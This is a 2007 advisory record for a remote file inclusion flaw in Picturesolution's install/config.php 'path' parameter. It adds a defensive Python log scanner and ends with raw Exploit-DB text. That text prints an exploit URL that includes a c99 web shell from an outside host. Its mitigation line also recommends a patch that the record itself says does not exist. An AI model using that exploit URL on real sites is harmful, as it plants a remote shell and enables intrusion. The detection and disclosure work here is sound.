Vendor: Picturesolution
By: Mogatil, Cold z3ro
CVSS: 5.5 (MEDIUM)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: Picturesolution
Affected Version From: <= v2.1
Affected Version To: <= v2.1
Patch Exists: NO
Year: 2007

Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to make the application include a remote file through the 'path' parameter of the 'config.php' script in the 'install' directory. This is achieved by supplying a URL that points to a malicious file as the value of 'path' in the request to 'config.php'.

Mitigation:

To mitigate the vulnerability, it is recommended to update to a patched version of Picturesolution or apply a security patch provided by the vendor.
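
Detection example (added here; it is not part of the original advisory or of Picturesolution's code): since the record lists no patch, this sketch flags access-log requests to install/config.php whose 'path' value is a URL, and generalizes beyond the single http:// case to any scheme:// value, including percent-encoded ones. The log lines, host names and addresses are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request part of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter value that begins with a URL scheme (http://, https://, ftp://, ...)
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
SCRIPT_SUFFIX = "/install/config.php"   # script named in the advisory
PARAM = "path"                          # parameter named in the advisory


def is_rfi_attempt(log_line):
    """True if the line requests install/config.php with a URL as 'path'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    # Normalise percent-encoding and case of the script path before comparing.
    if not unquote(parts.path).lower().endswith(SCRIPT_SUFFIX):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name.lower() == PARAM and REMOTE_RE.match(unquote(value)):
            return True
    return False


def scan(lines):
    """Return the log lines that look like inclusion attempts."""
    return [line for line in lines if is_rfi_attempt(line)]


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2007:10:00:00 +0000] "GET /Picssolution/install/'
    'config.php?path=http://remote.example/payload.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [06/Oct/2007:10:00:05 +0000] "GET /Picssolution/install/'
    'config.php?path=http%3A%2F%2Fremote.example%2Fp.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Oct/2007:10:01:00 +0000] "GET /Picssolution/install/'
    'config.php?path=../ HTTP/1.1" 200 812',
    '198.51.100.8 - - [06/Oct/2007:10:02:00 +0000] "GET /Picssolution/'
    'index.php?page=2 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible RFI attempt:", hit)
```

Any hit on a production host also indicates that the install directory is still reachable from the web.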
Source

Exploit-DB raw data:

Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vulnerabilities

Found By : Mogatil , http://www.hackteach.org/cc/ 
Posted By : Cold z3ro , http://www.hackteach.org/cc/


Exploit :

/install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt?


Example :
http://www.xxx.de/Picssolution/install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt?



# milw0rm.com [2007-10-06]